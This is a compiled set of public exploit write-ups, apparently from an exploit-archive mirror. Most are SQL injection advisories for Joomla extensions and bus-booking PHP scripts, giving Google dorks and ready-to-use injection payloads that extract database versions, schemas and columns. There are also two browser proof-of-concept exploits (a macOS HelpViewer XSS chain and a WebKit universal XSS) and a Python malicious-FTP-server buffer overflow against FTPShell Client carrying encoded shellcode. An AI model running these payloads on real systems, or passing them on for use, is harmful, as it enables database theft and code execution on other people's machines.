# 66+/*!50000Procedure*/+/*!50000Analyse*/+(extractvalue(0,/*!50000concat*/(0x27,0x496873616e2053656e63616e,0x3a,@@version)),0)-- -
# # # # #
HireHackking 
# # # # # 
# Exploit Title: Joomla! Component MultiTier v3.1 - SQL Injection
# Google Dork: inurl:index.php?option=com_multitier
# Date: 23.02.2017
# Vendor Homepage: http://www.beesto.com/
# Software Buy: https://extensions.joomla.org/extensions/extension/ads-a-affiliates/affiliate-systems/multitier/
# Demo: http://www.beesto.com/extensions/13-j-multitier/40-demo
# Version: 3.1
# Tested on: Win7 x64, Kali Linux x64
# # # # # 
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# Login as regular user
# http://localhost/[PATH]/index.php/component/multitier/?mtpage=takecodel&tid=1&lid=[SQL]
# -66'+/*!50000union*/+select+1,0x496873616e2053656e63616e,3,4,5,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),7,8+-- -
# http://localhost/[PATH]/index.php/component/multitier/?mtpage=link_preview&id=[SQL]
# -66'+/*!50000union*/+select+1,0x496873616e2053656e63616e,3,4,5,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),7,8+-- -
# http://localhost/[PATH]/index.php/component/multitier/?mtpage=takecodeb&tid=1&bid=[SQL]
# -66'+/*!50000union*/+select+(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),2,3+-- -
# # # # #
HireHackking 
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1040

HelpViewer is an application and using WebView to show a help file.
You can see it simply by the command:
open /Applications/Safari.app/Contents/Resources/Safari.help

or using "help:" scheme:
help:openbook=com.apple.safari.help
help:///Applications/Safari.app/Contents/Resources/Safari.help/Contents/Resources/index.html

HelpViewer's WebView has an inside protocol handler "x-help-script" that could be used to open an arbitrary local file. Therefore if we can run arbitrary Javascript code, we'll win easily and, of course, we can read an arbitrary local file with a XMLHttpRequest.

HelpViewer checks whether the path of the url is in a valid help file or not. But we can bypass this with a double encoded "../".

PoC:
document.location = "help:///Applications/Safari.app/Contents/Resources/Safari.help/%25252f..%25252f..%25252f..%25252f..%25252f..%25252f..%25252f/System/Library/PrivateFrameworks/Tourist.framework/Versions/A/Resources/en.lproj/offline.html?redirect=javascript%253adocument.write(1)";

The attached poc will pop up a Calculator.

Tested on macOS Sierra 10.12.1 (16B2659).
-->

<script>

/*
OSX: HelpViewer XSS leads to arbitrary file execution and arbitrary file read.

HelpViewer is an application and using WebView to show a help file.
You can see it simply by the command:
open /Applications/Safari.app/Contents/Resources/Safari.help

or using "help:" scheme:
help:openbook=com.apple.safari.help
help:///Applications/Safari.app/Contents/Resources/Safari.help/Contents/Resources/index.html

HelpViewer's WebView has an inside protocol handler "x-help-script" that could be used to open an arbitrary local file. Therefore if we can run arbitrary Javascript code, we'll win easily and, of course, we can read an arbitrary local file with a XMLHttpRequest.

HelpViewer checks whether the path of the url is in a valid help file or not. But we can bypass this with a double encoded "../".

PoC:
document.location = "help:///Applications/Safari.app/Contents/Resources/Safari.help/%25252f..%25252f..%25252f..%25252f..%25252f..%25252f..%25252f/System/Library/PrivateFrameworks/Tourist.framework/Versions/A/Resources/en.lproj/offline.html?redirect=javascript%253adocument.write(1)";

The attached poc will pop up a Calculator.

Tested on macOS Sierra 10.12.1 (16B2659).

*/

function main() {
    function second() {
        var f = document.createElement("iframe");
        f.onload = () => {
            f.contentDocument.location = "x-help-script://com.apple.machelp/scpt/OpnApp.scpt?:Applications:Calculator.app";
        };

        f.src = "help:openbook=com.apple.safari.help";

        document.documentElement.appendChild(f);
    }

    var url = "javascript%253aeval(atob('" + btoa(second.toString()) + "'));\nsecond();";

    document.location = "help:///Applications/Safari.app/Contents/Resources/Safari.help/%25252f..%25252f..%25252f..%25252f..%25252f..%25252f..%25252f/System/Library/PrivateFrameworks/Tourist.framework/Versions/A/Resources/en.lproj/offline.html?redirect=" + url;
}

main();

</script>
HireHackking 
# # # # # 
# Exploit Title: Joomla! Component JooDatabase v3.1.0 - SQL Injection
# Google Dork: inurl:index.php?option=com_joodb
# Date: 24.02.2017
# Vendor Homepage: https://feenders.de/
# Software Buy: https://extensions.joomla.org/extensions/extension/core-enhancements/coding-a-scripts-integration/joodatabase/
# Demo: https://joodb.feenders.de/db-example.html
# Version: 3.1.0
# Tested on: Win7 x64, Kali Linux x64
# # # # # 
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php?option=com_joodb&view=catalog&format=html&reset=false&Itemid=321&task=&search=[SQL]&searchfield=Ihsan_Sencan
# http://localhost/[PATH]/index.php?option=com_joodb&view=catalog&format=html&reset=false&Itemid=321&task=&search=Ihsan_Sencan&searchfield=[SQL]
# # # # #
HireHackking 
# # # # # 
# Exploit Title: Joomla! Component JO Facebook Gallery v4.5 - SQL Injection
# Google Dork: inurl:index.php?option=com_jofacebookgallery
# Date: 24.02.2017
# Vendor Homepage: http://joomcore.com/joomla32/
# Software Buy: https://extensions.joomla.org/extensions/extension/social-web/social-media/jo-facebook-gallery/
# Demo: http://demo.joomcore.com/joomla32/
# Version: 4.5
# Tested on: Win7 x64, Kali Linux x64
# # # # # 
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php?option=com_jofacebookgallery&view=category&id=[SQL]
# http://localhost/[PATH]/index.php?option=com_jofacebookgallery&view=albums&id=[SQL]
# http://localhost/[PATH]/index.php?option=com_jofacebookgallery&view=photo&id=[SQL]
# # # # #
HireHackking 
# # # # # 
# Exploit Title: Joomla! Component AJAX Search for K2 v2.2 - SQL Injection
# Google Dork: inurl:index.php?option=com_k2ajaxsearch
# Date: 24.02.2017
# Vendor Homepage: http://taleia.software/
# Software Buy: https://extensions.joomla.org/extensions/extension/extension-specific/k2-extensions/ajax-search-for-k2/
# Demo: http://k2ajaxsearch.taleia.software/demo/
# Version: 2.2
# Tested on: Win7 x64, Kali Linux x64
# # # # # 
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/?searchword=Ihsan_Sencan&option=com_k2ajaxsearch&=[SQL]
# http://localhost/[PATH]/?searchword=Ihsan_Sencan&option=com_k2ajaxsearch&module_id=101&efields[][]=[SQL]
# http://localhost/[PATH]/?searchword=Ihsan_Sencan&option=com_k2ajaxsearch&module_id=[SQL]&efields[][]=Ihsan_Sencan
# # # # #
HireHackking 
# # # # # 
# Exploit Title: Joomla! Component Community Surveys v4.3 - SQL Injection
# Google Dork: inurl:index.php?option=com_communitysurveys
# Date: 24.02.2017
# Vendor Homepage: http://corejoomla.com/
# Software Buy: https://extensions.joomla.org/extensions/extension/contacts-and-feedback/surveys/community-surveys/
# Demo: http://demo.corejoomla.com/surveys.html
# Version: 4.3
# Tested on: Win7 x64, Kali Linux x64
# # # # # 
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# index.php?option=com_communitysurveys&view=search
# http://localhost/[PATH]/?list_filter=Ihsan_Sencan&list_filter_field=author&filter_all_keywords=1&filter_order=a.catid&filter_order_Dir=desc&catid[]=[SQL]
# 66+AND(SELECT+1+from(SELECT+COUNT(*),CONCAT((SELECT+(SELECT+(SELECT+DISTINCT+CONCAT(0x496873616e2053656e63616e,0x7e,0x27,CAST(schema_name+AS+CHAR),0x27,0x7e)+FROM+INFORMATION_SCHEMA.SCHEMATA+WHERE+table_schema!=DATABASE()+LIMIT+1,1))+FROM+INFORMATION_SCHEMA.TABLES+LIMIT+0,1),+FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)+AND+1=1
# # # # #
HireHackking 
# # # # # 
# Exploit Title: Joomla! Component Community Polls v4.5.0 - SQL Injection
# Google Dork: inurl:index.php?option=com_communitypolls
# Date: 24.02.2017
# Vendor Homepage: http://corejoomla.com/
# Software Buy: https://extensions.joomla.org/extensions/extension/contacts-and-feedback/polls/community-polls/
# Demo: http://demo.corejoomla.com/polls.html
# Version: 4.5.0
# Tested on: Win7 x64, Kali Linux x64
# # # # # 
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# index.php?option=com_communitypolls&view=search
# http://localhost/[PATH]/?list_filter=Ihsan_Sencan&list_filter_field=author&filter_all_keywords=1&filter_order=a.catid&filter_order_Dir=desc&catid[]=[SQL]
# 66+AND(SELECT+1+from(SELECT+COUNT(*),CONCAT((SELECT+(SELECT+(SELECT+DISTINCT+CONCAT(0x496873616e2053656e63616e,0x7e,0x27,CAST(schema_name+AS+CHAR),0x27,0x7e)+FROM+INFORMATION_SCHEMA.SCHEMATA+WHERE+table_schema!=DATABASE()+LIMIT+1,1))+FROM+INFORMATION_SCHEMA.TABLES+LIMIT+0,1),+FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)+AND+1=1
# # # # #
HireHackking 
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1049

When the new page is loading, FrameLoader::clear is called to clear the old document and window.

Here's a snippet of FrameLoader::clear.

void FrameLoader::clear(Document* newDocument, bool clearWindowProperties, bool clearScriptObjects, bool clearFrameView)
{
    ...
    // Do this after detaching the document so that the unload event works.
    if (clearWindowProperties) {
        InspectorInstrumentation::frameWindowDiscarded(m_frame, m_frame.document()->domWindow());
        m_frame.document()->domWindow()->resetUnlessSuspendedForDocumentSuspension();
        m_frame.script().clearWindowShell(newDocument->domWindow(), m_frame.document()->pageCacheState() == Document::AboutToEnterPageCache); <<-------- (1)

        if (shouldClearWindowName(m_frame, *newDocument))
            m_frame.tree().setName(nullAtom);
    }

    ...
    m_frame.setDocument(nullptr); <<-------- (2)
    ...
}

The new document's window is attached at (1) before calling |m_frame.setDocument(nullptr)| that calls unload event handlers. So in the unload event handler, we could execute arbitrary javascript code on new document's window with a javascript: URI.


Tested on Safari 10.0.2(12602.3.12.0.1).
-->

<body>
<script>

/*

Apple WebKit: UXSS via FrameLoader::clear

When the new page is loading, FrameLoader::clear is called to clear the old document and window.

Here's a snippet of FrameLoader::clear.

void FrameLoader::clear(Document* newDocument, bool clearWindowProperties, bool clearScriptObjects, bool clearFrameView)
{
    ...
    // Do this after detaching the document so that the unload event works.
    if (clearWindowProperties) {
        InspectorInstrumentation::frameWindowDiscarded(m_frame, m_frame.document()->domWindow());
        m_frame.document()->domWindow()->resetUnlessSuspendedForDocumentSuspension();
        m_frame.script().clearWindowShell(newDocument->domWindow(), m_frame.document()->pageCacheState() == Document::AboutToEnterPageCache); <<-------- (1)

        if (shouldClearWindowName(m_frame, *newDocument))
            m_frame.tree().setName(nullAtom);
    }

    ...
    m_frame.setDocument(nullptr); <<-------- (2)
    ...
}

The new document's window is attached at (1) before calling |m_frame.setDocument(nullptr)| that calls unload event handlers. So in the unload event handler, we could execute arbitrary javascript code on new document's window with a javascript: URI.


Tested on Safari 10.0.2(12602.3.12.0.1).
*/

"use strict";

function log(txt) {
    //if (Array.isArray(txt))
    //    txt = Array.prototype.join.call(txt, ", ");

    let c = document.createElement("div");
    c.innerText = "log: " + txt;
    d.appendChild(c);
}

function main() {
    let f = document.body.appendChild(document.createElement("iframe"));
    
    let a = f.contentDocument.documentElement.appendChild(document.createElement("iframe"));
    a.contentWindow.onunload = () => {
        let b = f.contentDocument.documentElement.appendChild(document.createElement("iframe"));
        b.contentWindow.onunload = () => {
            f.src = "javascript:''";

            let c = f.contentDocument.documentElement.appendChild(document.createElement("iframe"));
            c.contentWindow.onunload = () => {
                f.src = "javascript:''";

                let d = f.contentDocument.appendChild(document.createElement("iframe"));
                d.contentWindow.onunload = () => {
                    f.src = "javascript:setTimeout(eval(atob('" + btoa("(" +function () {
                        alert(document.location);
                    } + ")") + "')), 0);";
                };
            };
        };
    };

    f.src = "https://abc.xyz/";
}

main();

/*
b JSC::globalFuncParseFloat

*/
</script>
</body>
HireHackking 
# # # # # 
# Exploit Title: Joomla! Component Content ConstructionKit v1.1 - SQL Injection
# Google Dork: inurl:index.php?option=com_os_cck
# Date: 04.03.2017
# Vendor Homepage: http://ordasoft.com/
# Software Buy: http://ordasoft.com/cck-content-construction-kit-for-joomla.html
# Demo: http://ordasvit.com/joomla-cck-classic/
# Version: 1.1
# Tested on: Win7 x64, Kali Linux x64
# # # # # 
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php/2016-04-11-13-03-22/search?search=Ihsan_Sencan&categories[]=[SQL]&task=search&option=com_os_cck&Itemid=133
# 9+AND(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(DATABASE()+AS+CHAR),0x7e,0x496873616e53656e63616e))+FROM+INFORMATION_SCHEMA.TABLES+WHERE+table_schema=DATABASE()+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)
# 1062 Duplicate entry 'ordasvit_joomla-cck-classic~IhsanSencan1' for key 'group_key' 
# Etc..
# # # # #
HireHackking 
# # # # # 
# Exploit Title: Advanced Bus Booking Script v2.04 - SQL Injection
# Google Dork: N/A
# Date: 06.03.2017
# Vendor Homepage: http://www.phpscriptsmall.com/
# Software : http://www.phpscriptsmall.com/product/advanced-bus-booking-script/
# Demo: http://travelbookingscript.com/demo/newbusbooking/
# Version: 2.04
# Tested on: Win7 x64, Kali Linux x64
# # # # # 
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/available_seat.php?hid_Busid=[SQL]
# http://localhost/[PATH]/seatcheck.php?busid=[SQL]
# http://localhost/[PATH]/seatcheck.php?seat=[SQL]
# http://localhost/[PATH]/seatcheck.php?seat=1&busid=1&dat=[SQL]
# # # # #
HireHackking 
# Exploit Title: FTPShell Client 6.53 buffer overflow on making initial connection
# Date: 2017-03-04
# Exploit Author: Peter Baris
# Vendor Homepage: http://www.saptech-erp.com.au
# Software Link: http://www.ftpshell.com/downloadclient.htm
# Version: Windows Server 2008 R2 x64
# Tested on: Windows Server 2008 R2 Standard x64
# CVE: CVE-2017-6465

# 2017-03-04: Software vendor notified
# 2017-03-06: No reply
# 2017-03-06: Publishing

import socket
import sys

shell=("\xdb\xce\xbf\xaa\xcc\x44\xc9\xd9\x74\x24\xf4\x5a\x29\xc9\xb1"
"\x52\x83\xc2\x04\x31\x7a\x13\x03\xd0\xdf\xa6\x3c\xd8\x08\xa4"
"\xbf\x20\xc9\xc9\x36\xc5\xf8\xc9\x2d\x8e\xab\xf9\x26\xc2\x47"
"\x71\x6a\xf6\xdc\xf7\xa3\xf9\x55\xbd\x95\x34\x65\xee\xe6\x57"
"\xe5\xed\x3a\xb7\xd4\x3d\x4f\xb6\x11\x23\xa2\xea\xca\x2f\x11"
"\x1a\x7e\x65\xaa\x91\xcc\x6b\xaa\x46\x84\x8a\x9b\xd9\x9e\xd4"
"\x3b\xd8\x73\x6d\x72\xc2\x90\x48\xcc\x79\x62\x26\xcf\xab\xba"
"\xc7\x7c\x92\x72\x3a\x7c\xd3\xb5\xa5\x0b\x2d\xc6\x58\x0c\xea"
"\xb4\x86\x99\xe8\x1f\x4c\x39\xd4\x9e\x81\xdc\x9f\xad\x6e\xaa"
"\xc7\xb1\x71\x7f\x7c\xcd\xfa\x7e\x52\x47\xb8\xa4\x76\x03\x1a"
"\xc4\x2f\xe9\xcd\xf9\x2f\x52\xb1\x5f\x24\x7f\xa6\xed\x67\xe8"
"\x0b\xdc\x97\xe8\x03\x57\xe4\xda\x8c\xc3\x62\x57\x44\xca\x75"
"\x98\x7f\xaa\xe9\x67\x80\xcb\x20\xac\xd4\x9b\x5a\x05\x55\x70"
"\x9a\xaa\x80\xd7\xca\x04\x7b\x98\xba\xe4\x2b\x70\xd0\xea\x14"
"\x60\xdb\x20\x3d\x0b\x26\xa3\x82\x64\xee\xb3\x6b\x77\xee\xa2"
"\x37\xfe\x08\xae\xd7\x56\x83\x47\x41\xf3\x5f\xf9\x8e\x29\x1a"
"\x39\x04\xde\xdb\xf4\xed\xab\xcf\x61\x1e\xe6\xad\x24\x21\xdc"
"\xd9\xab\xb0\xbb\x19\xa5\xa8\x13\x4e\xe2\x1f\x6a\x1a\x1e\x39"
"\xc4\x38\xe3\xdf\x2f\xf8\x38\x1c\xb1\x01\xcc\x18\x95\x11\x08"
"\xa0\x91\x45\xc4\xf7\x4f\x33\xa2\xa1\x21\xed\x7c\x1d\xe8\x79"
"\xf8\x6d\x2b\xff\x05\xb8\xdd\x1f\xb7\x15\x98\x20\x78\xf2\x2c"
"\x59\x64\x62\xd2\xb0\x2c\x92\x99\x98\x05\x3b\x44\x49\x14\x26"
"\x77\xa4\x5b\x5f\xf4\x4c\x24\xa4\xe4\x25\x21\xe0\xa2\xd6\x5b"
"\x79\x47\xd8\xc8\x7a\x42")

port = 21

try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.bind(("0.0.0.0", port))
        s.listen(5)
        print("[i] FTP server started on port: "+str(port)+"\r\n")
except:
        print("[!] Failed to bind the server to port: "+str(port)+"\r\n")



# 004b95dc in ftpshell.exe PUSH ESI ; RETN
eip = "\xdc\x95\x4b"
nops = "\x90"*8 
junk = "A"*(400-len(nops)-len(shell))
buffer = nops + shell + junk + eip

while True:
    conn, addr = s.accept()
    conn.send('220 Welcome to your unfriendly FTP server\r\n')
    print(conn.recv(1024))
    conn.send("331 OK\r\n")
    print(conn.recv(1024))
    conn.send('230 OK\r\n')
    print(conn.recv(1024))
    conn.send('220 "'+buffer+'" is current directory\r\n')
HireHackking 
# # # # # 
# Exploit Title: Joomla! Component AltaUserPoints v1.1 - SQL Injection
# Google Dork: inurl:index.php?option=com_altauserpoints
# Date: 04.03.2017
# Vendor Homepage: https://www.nordmograph.com/
# Software: https://extensions.joomla.org/extensions/extension/e-commerce/credits-a-point-systems/altauserpoints/
# Demo: https://www.nordmograph.com/workshop/
# Version: 1.1
# Tested on: Win7 x64, Kali Linux x64
# # # # # 
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# Login as regular user
# http://localhost/[PATH]/index.php?option=com_altauserpoints&view=account&userid=[SQL]
# 1'+/*!50000OR*/+1+/*!50000GROUP*/+BY+/*!50000CONCAT_WS*/(0x3a,0x496873616e53656e63616e,DATABASE(),FLOOR(RAND(0)*2))+HAVING+MIN(0)+OR+1-- -
# # # # #
HireHackking 
# # # # # 
# Exploit Title: Joomla! Component Monthly Archive v3.6.4 - SQL Injection
# Google Dork: inurl:index.php?option=com_monthlyarchive
# Date: 04.03.2017
# Vendor Homepage: http://web357.eu/
# Software Buy: https://extensions.joomla.org/extensions/extension/news-display/articles-display/monthly-archive/
# Demo: http://demo.web357.eu/joomla/en/browse/monthly-archive
# Version: 3.6.4
# Tested on: Win7 x64, Kali Linux x64
# # # # # 
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php?option=com_monthlyarchive&view=monthlyarchive&month_year_form=07-2017&order=0&author_form=[SQL]
# 1+AND(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(DATABASE()+AS+CHAR),0x7e,0x496873616e53656e63616e))+FROM+INFORMATION_SCHEMA.TABLES+WHERE+table_schema=DATABASE()+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)
# # # # #
HireHackking 
# # # # # 
# Exploit Title: Joomla! Component JUX EventOn v1.0.1 - SQL Injection
# Google Dork: inurl:index.php?option=com_jux_eventon
# Date: 04.03.2017
# Vendor Homepage: http://joomlaux.com/
# Software Buy: https://extensions.joomla.org/extensions/extension/calendars-a-events/events/jux-eventon/
# Demo: http://demo.joomlaux.com/extensions/eventon/
# Version: 1.0.1
# Tested on: Win7 x64, Kali Linux x64
# # # # # 
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php?option=com_jux_eventon&view=event&id=[SQL]
# 3+union+select+1,@@version,3,4,5,6
# # # # #
HireHackking 
# # # # # 
# Exploit Title: Entrepreneur Bus Booking Script v3.03 - SQL Injection
# Google Dork: N/A
# Date: 06.03.2017
# Vendor Homepage: http://www.phpscriptsmall.com/
# Software : http://www.phpscriptsmall.com/product/entrepreneur-bus-booking-script/
# Demo: http://travelbookingscript.com/demo/busbooking/
# Version: 3.03
# Tested on: Win7 x64, Kali Linux x64
# # # # # 
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/available_seat.php?hid_Busid=[SQL]
# # # # #